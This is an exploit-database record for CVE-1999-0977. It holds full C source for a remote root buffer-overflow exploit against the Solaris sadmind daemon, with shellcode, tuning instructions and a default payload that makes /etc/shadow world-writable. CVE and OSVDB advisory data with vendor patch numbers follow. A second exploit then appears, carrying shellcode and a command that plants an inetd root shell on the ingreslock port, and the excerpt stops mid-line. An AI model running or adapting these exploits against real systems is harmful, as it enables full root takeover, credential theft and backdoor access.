{"id": "EDB-ID:19669", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability 2", "description": "Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability (2). CVE-1999-0977. Remote exploit for solaris platform", "published": "1999-06-24T00:00:00", "modified": "1999-06-24T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/19669/", "reporter": "Cheez Whiz", "references": [], "cvelist": ["CVE-1999-0977"], "lastseen": "2016-02-02T12:24:45", "viewCount": 3, "enchantments": {"score": {"value": 9.2, "vector": "NONE", "modified": "2016-02-02T12:24:45", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-1999-0977"]}, {"type": "osvdb", "idList": ["OSVDB:2558"]}, {"type": "exploitdb", "idList": ["EDB-ID:19670", "EDB-ID:19668", "EDB-ID:19672", "EDB-ID:213"]}, {"type": "cert", "idList": ["VU:28934", "VU:41870"]}], "modified": "2016-02-02T12:24:45", "rev": 2}, "vulnersScore": 9.2}, "sourceHref": "https://www.exploit-db.com/download/19669/", "sourceData": "source: http://www.securityfocus.com/bid/866/info\r\n \r\nCertain versions of Solaris ship with a version of sadmind which is vulnerable to a remotely exploitable buffer overflow attack. sadmind is the daemon used by Solstice AdminSuite applications to perform distributed system administration operations such as adding users. The sadmind daemon is started automatically by the inetd daemon whenever a request to invoke an operation is received.\r\n \r\nUnder vulnerable versions of sadmind (2.6 and 7.0 have been tested), if a long buffer is passed to a NETMGT_PROC_SERVICE request (called via clnt_call()), it is possible to overwrite the stack pointer and execute arbitrary code. The actual buffer in questions appears to hold the client's domain name. The overflow in sadmind takes place in the get_auth() function, part of the /usr/snadm/lib/libmagt.so.2 library. Because sadmind runs as root any code launched as a result will run as with root privileges, therefore resulting in a root compromise. \r\n\r\n/**\r\n*** sadmindex - i386 Solaris remote root exploit for /usr/sbin/sadmind\r\n***\r\n*** Tested and confirmed under Solaris 2.6 and 7.0 (i386)\r\n***\r\n*** Usage: % sadmindex -h hostname -c command -s sp -j junk [-o offset] \\\r\n*** [-a alignment] [-p]\r\n***\r\n*** where hostname is the hostname of the machine running the vulnerable\r\n*** system administration daemon, command is the command to run as root\r\n*** on the vulnerable machine, sp is the %esp stack pointer value, junk\r\n*** is the number of bytes needed to fill the target stack frame (which\r\n*** should be a multiple of 4), offset is the number of bytes to add to\r\n*** sp to calculate the desired return address, and alignment is the\r\n*** number of bytes needed to correctly align the contents of the exploit\r\n*** buffer.\r\n***\r\n*** If run with a -p option, the exploit will only \"ping\" sadmind on the\r\n*** remote machine to start it running. The daemon will be otherwise\r\n*** untouched. Since pinging the daemon does not require an exploit\r\n*** buffer to be constructed, you can safely omit the -c, -s, and -j\r\n*** options if you use -p.\r\n***\r\n*** When specifying a command, be sure to pass it to the exploit as a\r\n*** single argument, namely enclose the command string in quotes if it\r\n*** contains spaces or other special shell delimiter characters. The\r\n*** exploit will pass this string without modification to /bin/sh -c on\r\n*** the remote machine, so any normally allowed Bourne shell syntax is\r\n*** also allowed in the command string. The command string and the\r\n*** assembly code to run it must fit inside a buffer of 512 bytes, so\r\n*** the command string has a maximum length of about 390 bytes or so.\r\n***\r\n*** I have provided confirmed %esp stack pointer values for Solaris on a\r\n*** Pentium PC system running Solaris 2.6 5/98 and on a Pentium PC system\r\n*** running Solaris 7.0 10/98. On each system, sadmind was started from\r\n*** an instance of inetd that was started at boot time by init. There\r\n*** is a fair possibility that the demonstration values will not work\r\n*** due to differing sets of environment variables, for example if the\r\n*** the running inetd on the remote machine was started manually from an\r\n*** interactive shell. If you find that the sample value for %esp does\r\n*** not work, try adjusting the value by -2048 to 2048 from the sample in\r\n*** increments of 32 for starters. The junk parameter seems to vary from\r\n*** version to version, but the sample values should be appropriate for\r\n*** the listed versions and are not likely to need adjustment. The offset\r\n*** parameter and the alignment parameter have default values that will be\r\n*** used if no overriding values are specified on the command line. The\r\n*** default values should be suitable and it will not likely be necessary\r\n*** to override them.\r\n***\r\n*** Demonstration values for i386 Solaris:\r\n***\r\n*** (2.6) sadmindex -h host.example.com -c \"touch HEH\" -s 0x080418ec -j 512\r\n*** (7.0) sadmindex -h host.example.com -c \"touch HEH\" -s 0x08041798 -j 536\r\n***\r\n*** THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER\r\n***\r\n*** Cheez Whiz\r\n*** cheezbeast@hotmail.com\r\n***\r\n*** June 24, 1999\r\n**/\r\n\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <rpc/rpc.h>\r\n\r\n#define NETMGT_PROG 100232\r\n#define NETMGT_VERS 10\r\n#define NETMGT_PROC_PING 0\r\n#define NETMGT_PROC_SERVICE 1\r\n\r\n#define NETMGT_UDP_PING_TIMEOUT 30\r\n#define NETMGT_UDP_PING_RETRY_TIMEOUT 5\r\n#define NETMGT_UDP_SERVICE_TIMEOUT 1\r\n#define NETMGT_UDP_SERVICE_RETRY_TIMEOUT 2\r\n\r\n#define NETMGT_HEADER_TYPE 6\r\n#define NETMGT_ARG_INT 3\r\n#define NETMGT_ARG_STRING 9\r\n#define NETMGT_ENDOFARGS \"netmgt_endofargs\"\r\n\r\n#define ADM_FW_VERSION \"ADM_FW_VERSION\"\r\n#define ADM_CLIENT_DOMAIN \"ADM_CLIENT_DOMAIN\"\r\n#define ADM_FENCE \"ADM_FENCE\"\r\n\r\n#define BUFLEN 1056\t\t/* 548+8+512-12 */\r\n#define ADDRLEN\t8\r\n#define LEN 76\r\n\r\n/* #define JUNK 512 */\t\t/* 524-12 (Solaris 2.6) */\r\n/* #define JUNK 536 */\t\t/* 548-12 (Solaris 7.0) */\r\n#define OFFSET 572\t\t/* default offset */\r\n#define ALIGNMENT 0\t\t/* default alignment */\r\n\r\n#define NOP 0x90\r\n\r\nchar shell[] =\r\n/* 0 */ \"\\xeb\\x45\" /* jmp springboard */\r\n/* syscall: */\r\n/* 2 */ \"\\x9a\\xff\\xff\\xff\\xff\\x07\\xff\" /* lcall 0x7,0x0 */\r\n/* 9 */ \"\\xc3\" /* ret */\r\n/* start: */\r\n/* 10 */ \"\\x5e\" /* popl %esi */\r\n/* 11 */ \"\\x31\\xc0\" /* xor %eax,%eax */\r\n/* 13 */ \"\\x89\\x46\\xb7\" /* movl %eax,-0x49(%esi) */\r\n/* 16 */ \"\\x88\\x46\\xbc\" /* movb %al,-0x44(%esi) */\r\n/* execve: */\r\n/* 19 */ \"\\x31\\xc0\" /* xor %eax,%eax */\r\n/* 21 */ \"\\x50\" /* pushl %eax */\r\n/* 22 */ \"\\x56\" /* pushl %esi */\r\n/* 23 */ \"\\x8b\\x1e\" /* movl (%esi),%ebx */\r\n/* 25 */ \"\\xf7\\xdb\" /* negl %ebx */\r\n/* 27 */ \"\\x89\\xf7\" /* movl %esi,%edi */\r\n/* 29 */ \"\\x83\\xc7\\x10\" /* addl $0x10,%edi */\r\n/* 32 */ \"\\x57\" /* pushl %edi */\r\n/* 33 */ \"\\x89\\x3e\" /* movl %edi,(%esi) */\r\n/* 35 */ \"\\x83\\xc7\\x08\" /* addl $0x8,%edi */\r\n/* 38 */ \"\\x88\\x47\\xff\" /* movb %al,-0x1(%edi) */\r\n/* 41 */ \"\\x89\\x7e\\x04\" /* movl %edi,0x4(%esi) */\r\n/* 44 */ \"\\x83\\xc7\\x03\" /* addl $0x3,%edi */\r\n/* 47 */ \"\\x88\\x47\\xff\" /* movb %al,-0x1(%edi) */\r\n/* 50 */ \"\\x89\\x7e\\x08\" /* movl %edi,0x8(%esi) */\r\n/* 53 */ \"\\x01\\xdf\" /* addl %ebx,%edi */\r\n/* 55 */ \"\\x88\\x47\\xff\" /* movb %al,-0x1(%edi) */\r\n/* 58 */ \"\\x89\\x46\\x0c\" /* movl %eax,0xc(%esi) */\r\n/* 61 */ \"\\xb0\\x3b\" /* movb $0x3b,%al */\r\n/* 63 */ \"\\xe8\\xbe\\xff\\xff\\xff\" /* call syscall */\r\n/* 68 */ \"\\x83\\xc4\\x0c\" /* addl $0xc,%esp */\r\n/* springboard: */\r\n/* 71 */ \"\\xe8\\xbe\\xff\\xff\\xff\" /* call start */\r\n/* data: */\r\n/* 76 */ \"\\xff\\xff\\xff\\xff\" /* DATA */\r\n/* 80 */ \"\\xff\\xff\\xff\\xff\" /* DATA */\r\n/* 84 */ \"\\xff\\xff\\xff\\xff\" /* DATA */\r\n/* 88 */ \"\\xff\\xff\\xff\\xff\" /* DATA */\r\n/* 92 */ \"\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\xff\" /* DATA */\r\n/* 100 */ \"\\x2d\\x63\\xff\"; /* DATA */\r\n\r\nextern char *optarg;\r\n\r\nstruct nm_send_header {\r\n struct timeval timeval1;\r\n struct timeval timeval2;\r\n struct timeval timeval3;\r\n unsigned int uint1;\r\n unsigned int uint2;\r\n unsigned int uint3;\r\n unsigned int uint4;\r\n unsigned int uint5;\r\n struct in_addr inaddr1;\r\n struct in_addr inaddr2;\r\n unsigned long ulong1;\r\n unsigned long ulong2;\r\n struct in_addr inaddr3;\r\n unsigned long ulong3;\r\n unsigned long ulong4;\r\n unsigned long ulong5;\r\n struct timeval timeval4;\r\n unsigned int uint6;\r\n struct timeval timeval5;\r\n char *string1;\r\n char *string2;\r\n char *string3;\r\n unsigned int uint7;\r\n};\r\n\r\nstruct nm_send_arg_int {\r\n char *string1;\r\n unsigned int uint1;\r\n unsigned int uint2;\r\n int int1;\r\n unsigned int uint3;\r\n unsigned int uint4;\r\n};\r\n\r\nstruct nm_send_arg_string {\r\n char *string1;\r\n unsigned int uint1;\r\n unsigned int uint2;\r\n char *string2;\r\n unsigned int uint3;\r\n unsigned int uint4;\r\n};\r\n\r\nstruct nm_send_footer {\r\n char *string1;\r\n};\r\n\r\nstruct nm_send {\r\n struct nm_send_header header;\r\n struct nm_send_arg_int version;\r\n struct nm_send_arg_string string;\r\n struct nm_send_arg_int fence;\r\n struct nm_send_footer footer;\r\n};\r\n\r\nstruct nm_reply {\r\n unsigned int uint1;\r\n unsigned int uint2;\r\n char *string1;\r\n};\r\n\r\nbool_t\r\nxdr_nm_send_header(XDR *xdrs, struct nm_send_header *objp)\r\n{\r\n char *addr;\r\n size_t size = sizeof(struct in_addr);\r\n\r\n if (!xdr_long(xdrs, &objp->timeval1.tv_sec))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval1.tv_usec))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval2.tv_sec))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval2.tv_usec))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval3.tv_sec))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval3.tv_usec))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint1))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint2))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint3))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint4))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint5))\r\n\treturn (FALSE);\r\n addr = (char *) &objp->inaddr1.s_addr;\r\n if (!xdr_bytes(xdrs, &addr, &size, size))\r\n\treturn (FALSE);\r\n addr = (char *) &objp->inaddr2.s_addr;\r\n if (!xdr_bytes(xdrs, &addr, &size, size))\r\n\treturn (FALSE);\r\n if (!xdr_u_long(xdrs, &objp->ulong1))\r\n\treturn (FALSE);\r\n if (!xdr_u_long(xdrs, &objp->ulong2))\r\n\treturn (FALSE);\r\n addr = (char *) &objp->inaddr3.s_addr;\r\n if (!xdr_bytes(xdrs, &addr, &size, size))\r\n\treturn (FALSE);\r\n if (!xdr_u_long(xdrs, &objp->ulong3))\r\n\treturn (FALSE);\r\n if (!xdr_u_long(xdrs, &objp->ulong4))\r\n\treturn (FALSE);\r\n if (!xdr_u_long(xdrs, &objp->ulong5))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval4.tv_sec))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval4.tv_usec))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint6))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval5.tv_sec))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval5.tv_usec))\r\n\treturn (FALSE);\r\n if (!xdr_wrapstring(xdrs, &objp->string1))\r\n\treturn (FALSE);\r\n if (!xdr_wrapstring(xdrs, &objp->string2))\r\n\treturn (FALSE);\r\n if (!xdr_wrapstring(xdrs, &objp->string3))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint7))\r\n\treturn (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t\r\nxdr_nm_send_arg_int(XDR *xdrs, struct nm_send_arg_int *objp)\r\n{\r\n if (!xdr_wrapstring(xdrs, &objp->string1))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint1))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint2))\r\n\treturn (FALSE);\r\n if (!xdr_int(xdrs, &objp->int1))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint3))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint4))\r\n\treturn (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t\r\nxdr_nm_send_arg_string(XDR *xdrs, struct nm_send_arg_string *objp)\r\n{\r\n if (!xdr_wrapstring(xdrs, &objp->string1))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint1))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint2))\r\n\treturn (FALSE);\r\n if (!xdr_wrapstring(xdrs, &objp->string2))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint3))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint4))\r\n\treturn (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t\r\nxdr_nm_send_footer(XDR *xdrs, struct nm_send_footer *objp)\r\n{\r\n if (!xdr_wrapstring(xdrs, &objp->string1))\r\n\treturn (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t\r\nxdr_nm_send(XDR *xdrs, struct nm_send *objp)\r\n{\r\n if (!xdr_nm_send_header(xdrs, &objp->header))\r\n\treturn (FALSE);\r\n if (!xdr_nm_send_arg_int(xdrs, &objp->version))\r\n\treturn (FALSE);\r\n if (!xdr_nm_send_arg_string(xdrs, &objp->string))\r\n\treturn (FALSE);\r\n if (!xdr_nm_send_arg_int(xdrs, &objp->fence))\r\n\treturn (FALSE);\r\n if (!xdr_nm_send_footer(xdrs, &objp->footer))\r\n\treturn (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t\r\nxdr_nm_reply(XDR *xdrs, struct nm_reply *objp)\r\n{\r\n if (!xdr_u_int(xdrs, &objp->uint1))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint2))\r\n\treturn (FALSE);\r\n if (!xdr_wrapstring(xdrs, &objp->string1))\r\n\treturn (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nint\r\nmain(int argc, char *argv[])\r\n{\r\n CLIENT *cl;\r\n struct nm_send send;\r\n struct nm_reply reply;\r\n struct timeval tm;\r\n enum clnt_stat stat;\r\n int c, i, len, slen, clen;\r\n char *program, *cp, buf[BUFLEN+1];\r\n char *hostname, *command;\r\n int junk = 0, offset, alignment, pinging = 0;\r\n unsigned long int sp = 0, addr;\r\n\r\n program = argv[0];\r\n hostname = \"localhost\";\r\n command = \"chmod 666 /etc/shadow\";\r\n offset = OFFSET; alignment = ALIGNMENT;\r\n while ((c = getopt(argc, argv, \"h:c:s:j:o:a:p\")) != EOF) {\r\n\tswitch (c) {\r\n\tcase 'h':\r\n\t hostname = optarg;\r\n\t break;\r\n\tcase 'c':\r\n\t command = optarg; \r\n\t break;\r\n\tcase 's':\r\n\t sp = strtoul(optarg, NULL, 0);\r\n\t break;\r\n\tcase 'j':\r\n\t junk = (int) strtol(optarg, NULL, 0);\r\n\t break;\r\n\tcase 'o':\r\n\t offset = (int) strtol(optarg, NULL, 0);\r\n\t break;\r\n\tcase 'a':\r\n\t alignment = (int) strtol(optarg, NULL, 0);\r\n\t break;\r\n\tcase 'p':\r\n\t pinging = 1;\r\n\t break;\r\n\tdefault:\r\n\t fprintf(stderr, \"usage: %s -h hostname -c command -s sp -j junk \"\r\n\t\t \"[-o offset] [-a alignment] [-p]\\n\", program);\r\n\t exit(1);\r\n\t break;\r\n\t}\r\n }\r\n memset(buf, NOP, BUFLEN);\r\n junk &= 0xfffffffc;\r\n for (i = 0, cp = buf + alignment; i < junk / 4; i++) {\r\n\t*cp++ = (sp >> 0) & 0xff;\r\n\t*cp++ = (sp >> 8) & 0xff;\r\n\t*cp++ = (sp >> 16) & 0xff;\r\n\t*cp++ = (sp >> 24) & 0xff;\r\n }\r\n addr = sp + offset;\r\n for (i = 0; i < ADDRLEN / 4; i++) {\r\n\t*cp++ = (addr >> 0) & 0xff;\r\n\t*cp++ = (addr >> 8) & 0xff;\r\n\t*cp++ = (addr >> 16) & 0xff;\r\n\t*cp++ = (addr >> 24) & 0xff;\r\n }\r\n slen = strlen(shell); clen = strlen(command);\r\n len = clen; len++; len = -len;\r\n shell[LEN+0] = (len >> 0) & 0xff;\r\n shell[LEN+1] = (len >> 8) & 0xff;\r\n shell[LEN+2] = (len >> 16) & 0xff;\r\n shell[LEN+3] = (len >> 24) & 0xff;\r\n cp = buf + BUFLEN - 1 - clen - slen;\r\n memcpy(cp, shell, slen); cp += slen;\r\n memcpy(cp, command, clen); cp += clen;\r\n *cp = '\\xff';\r\n buf[BUFLEN] = '\\0';\r\n memset(&send, 0, sizeof(struct nm_send));\r\n send.header.uint2 = NETMGT_HEADER_TYPE;\r\n send.header.string1 = \"\";\r\n send.header.string2 = \"\";\r\n send.header.string3 = \"\";\r\n send.header.uint7 =\r\n\tstrlen(ADM_FW_VERSION) + 1 +\r\n\t(4 * sizeof(unsigned int)) + sizeof(int) +\r\n\tstrlen(ADM_CLIENT_DOMAIN) + 1 +\r\n\t(4 * sizeof(unsigned int)) + strlen(buf) + 1 +\r\n\tstrlen(ADM_FENCE) + 1 +\r\n\t(4 * sizeof(unsigned int)) + sizeof(int) +\r\n\tstrlen(NETMGT_ENDOFARGS) + 1;\r\n send.version.string1 = ADM_FW_VERSION;\r\n send.version.uint1 = NETMGT_ARG_INT;\r\n send.version.uint2 = sizeof(int);\r\n send.version.int1 = 1;\r\n send.string.string1 = ADM_CLIENT_DOMAIN;\r\n send.string.uint1 = NETMGT_ARG_STRING;\r\n send.string.uint2 = strlen(buf);\r\n send.string.string2 = buf;\r\n send.fence.string1 = ADM_FENCE;\r\n send.fence.uint1 = NETMGT_ARG_INT;\r\n send.fence.uint2 = sizeof(int);\r\n send.fence.int1 = 666;\r\n send.footer.string1 = NETMGT_ENDOFARGS;\r\n cl = clnt_create(hostname, NETMGT_PROG, NETMGT_VERS, \"udp\");\r\n if (cl == NULL) {\r\n\tclnt_pcreateerror(\"clnt_create\");\r\n\texit(1);\r\n }\r\n cl->cl_auth = authunix_create(\"localhost\", 0, 0, 0, NULL);\r\n if (!pinging) {\r\n\tfprintf(stdout,\r\n\t\t\"%%esp 0x%08lx offset %d --> return address 0x%08lx [%d+%d]\\n\",\r\n\t\tsp, offset, addr, alignment, junk);\r\n\ttm.tv_sec = NETMGT_UDP_SERVICE_TIMEOUT; tm.tv_usec = 0;\r\n\tif (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm)) {\r\n\t fprintf(stderr, \"exploit failed; unable to set timeout\\n\");\r\n\t exit(1);\r\n\t}\r\n\ttm.tv_sec = NETMGT_UDP_SERVICE_RETRY_TIMEOUT; tm.tv_usec = 0;\r\n\tif (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm)) {\r\n\t fprintf(stderr, \"exploit failed; unable to set timeout\\n\");\r\n\t exit(1);\r\n\t}\r\n\tstat = clnt_call(cl, NETMGT_PROC_SERVICE,\r\n\t\t\t xdr_nm_send, (caddr_t) &send,\r\n\t\t\t xdr_nm_reply, (caddr_t) &reply, tm);\r\n\tif (stat != RPC_SUCCESS) {\r\n\t clnt_perror(cl, \"clnt_call\");\r\n\t fprintf(stdout, \"now check if exploit worked; \"\r\n\t\t \"RPC failure was expected\\n\");\r\n\t exit(0);\r\n\t}\r\n\tfprintf(stderr, \"exploit failed; \"\r\n\t\t\"RPC succeeded and returned { %u, %u, \\\"%s\\\" }\\n\",\r\n\t\treply.uint1, reply.uint2, reply.string1);\r\n\tclnt_destroy(cl);\r\n\texit(1);\r\n } else {\r\n\ttm.tv_sec = NETMGT_UDP_PING_TIMEOUT; tm.tv_usec = 0;\r\n\tif (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm)) {\r\n\t fprintf(stderr, \"exploit failed; unable to set timeout\\n\");\r\n\t exit(1);\r\n\t}\r\n\ttm.tv_sec = NETMGT_UDP_PING_RETRY_TIMEOUT; tm.tv_usec = 0;\r\n\tif (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm)) {\r\n\t fprintf(stderr, \"exploit failed; unable to set timeout\\n\");\r\n\t exit(1);\r\n\t}\r\n\tstat = clnt_call(cl, NETMGT_PROC_PING,\r\n\t\t\t xdr_void, NULL,\r\n\t\t\t xdr_void, NULL, tm);\r\n\tif (stat != RPC_SUCCESS) {\r\n\t clnt_perror(cl, \"clnt_call\");\r\n\t exit(1);\r\n\t}\r\n\tclnt_destroy(cl);\r\n\texit(0);\r\n }\r\n}\r\n", "osvdbidlist": ["2558"]}

{"cve": [{"lastseen": "2020-10-03T11:36:55", "description": "Buffer overflow in Solaris sadmind allows remote attackers to gain root privileges using a NETMGT_PROC_SERVICE request.", "edition": 3, "cvss3": {}, "published": "1999-12-10T05:00:00", "title": "CVE-1999-0977", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0977"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/o:sun:solaris:2.5.1", "cpe:/o:sun:solaris:2.6", "cpe:/o:sun:sunos:-", "cpe:/o:sun:sunos:5.5.1", "cpe:/o:sun:sunos:5.7", "cpe:/o:sun:solaris:7.0", "cpe:/o:sun:sunos:5.5", "cpe:/o:sun:solaris:2.5"], "id": "CVE-1999-0977", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0977", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:sun:sunos:5.5:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:-:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:7.0:*:x86:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:2.6:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:2.5.1:*:ppc:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.7:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:2.5.1:*:x86:*:*:*:*:*", "cpe:2.3:o:sun:solaris:2.5:*:x86:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:19:57", "bulletinFamily": "software", "cvelist": ["CVE-1999-0977"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Solaris sadmind daemon. The daemon fails to validate intput to the amsl_verify() function during a NETMGT_PROC_SERVICE request resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code as root resulting in a loss of integrity and confidentiality.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Sun Microsystems has released a patch to address this vulnerability.\n\nOS Version - Patch ID\n---------------------\nSunOS 5.7 - 108662-01 \nSunOS 5.7_x86 - 108663-01 \nSunOS 5.6 - 108660-01 \nSunOS 5.6_x86 - 108661-01 \nSunOS 5.5.1 - 108658-01\nSunOS 5.5.1_x86 - 108659-01\nSunOS 5.5 - 108656-01\nSunOS 5.5_x86 - 108657-01\n## Short Description\nA remote overflow exists in Solaris sadmind daemon. The daemon fails to validate intput to the amsl_verify() function during a NETMGT_PROC_SERVICE request resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code as root resulting in a loss of integrity and confidentiality.\n## References:\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=secbull/191)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/1999-q4/0291.html\nKeyword: RPC\nKeyword: Solstice AdminSuite\nKeyword: Remote Procedure Call\nISS X-Force ID: 3688\n[CVE-1999-0977](https://vulners.com/cve/CVE-1999-0977)\nCIAC Advisory: k-013\nCERT VU: 28934\nCERT: CA-2001-11\nCERT: CA-1999-16\nBugtraq ID: 866\n", "modified": "1999-12-10T11:30:24", "published": "1999-12-10T11:30:24", "href": "https://vulners.com/osvdb/OSVDB:2558", "id": "OSVDB:2558", "type": "osvdb", "title": "Solaris sadmind amsl_verify() Remote Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T11:56:51", "description": "Solaris sadmind Remote Buffer Overflow Exploit. CVE-1999-0977. Remote exploit for solaris platform", "published": "2000-12-01T00:00:00", "type": "exploitdb", "title": "Solaris sadmind Remote Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0977"], "modified": "2000-12-01T00:00:00", "id": "EDB-ID:213", "href": "https://www.exploit-db.com/exploits/213/", "sourceData": "/*************************************************************************\\\r\n** **\r\n** Super Solaris sadmin Exploit by optyx <optyx@uberhax0r.net> **\r\n** based on sadminsparc. and sadminx86.c by Cheez Whiz **\r\n** **\r\n\\*************************************************************************/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <rpc/rpc.h>\r\n\r\nchar shellsparc[] =\r\n \"\\x20\\xbf\\xff\\xff\\x20\\xbf\\xff\\xff\\x7f\\xff\\xff\\xff\"\r\n \"\\x90\\x03\\xe0\\x5c\\x92\\x22\\x20\\x10\\x94\\x1b\\xc0\\x0f\"\r\n \"\\xec\\x02\\x3f\\xf0\\xac\\x22\\x80\\x16\\xae\\x02\\x60\\x10\"\r\n \"\\xee\\x22\\x3f\\xf0\\xae\\x05\\xe0\\x08\\xc0\\x2d\\xff\\xff\"\r\n \"\\xee\\x22\\x3f\\xf4\\xae\\x05\\xe0\\x03\\xc0\\x2d\\xff\\xff\"\r\n \"\\xee\\x22\\x3f\\xf8\\xae\\x05\\xc0\\x16\\xc0\\x2d\\xff\\xff\"\r\n \"\\xc0\\x22\\x3f\\xfc\\x82\\x10\\x20\\x3b\\x91\\xd0\\x20\\x08\"\r\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"\r\n \"\\xff\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\xff\"\r\n \"\\x2d\\x63\\xff\";\r\n\r\nchar shellx86[] =\r\n \"\\xeb\\x45\\x9a\\xff\\xff\\xff\\xff\\x07\\xff\\xc3\\x5e\\x31\"\r\n \"\\xc0\\x89\\x46\\xb7\\x88\\x46\\xbc\\x31\\xc0\\x50\\x56\\x8b\"\r\n \"\\x1e\\xf7\\xdb\\x89\\xf7\\x83\\xc7\\x10\\x57\\x89\\x3e\\x83\"\r\n \"\\xc7\\x08\\x88\\x47\\xff\\x89\\x7e\\x04\\x83\\xc7\\x03\\x88\"\r\n \"\\x47\\xff\\x89\\x7e\\x08\\x01\\xdf\\x88\\x47\\xff\\x89\\x46\"\r\n \"\\x0c\\xb0\\x3b\\xe8\\xbe\\xff\\xff\\xff\\x83\\xc4\\x0c\\xe8\"\r\n \"\\xbe\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"\r\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\"\r\n \"\\x2f\\x73\\x68\\xff\\x2d\\x63\\xff\";\r\n \r\n\r\nint buflen[] = { 1076, 1056 };\r\nint addrlen[] = { 560, 8 };\r\nint lens[] = { 84, 76 };\r\nint offset[] = { 688, 572 };\r\nint alignment[] = { 4, 0 };\r\nlong int nops[] = { 0x801bc00f, 0x90 };\r\nint junks[] = { 512, 536 };\r\nchar command[] = \"echo 'ingreslock stream tcp nowait root /bin/sh sh -i' \"\r\n \t \"> /tmp/.x; /usr/sbin/inetd -s /tmp/.x; rm -f 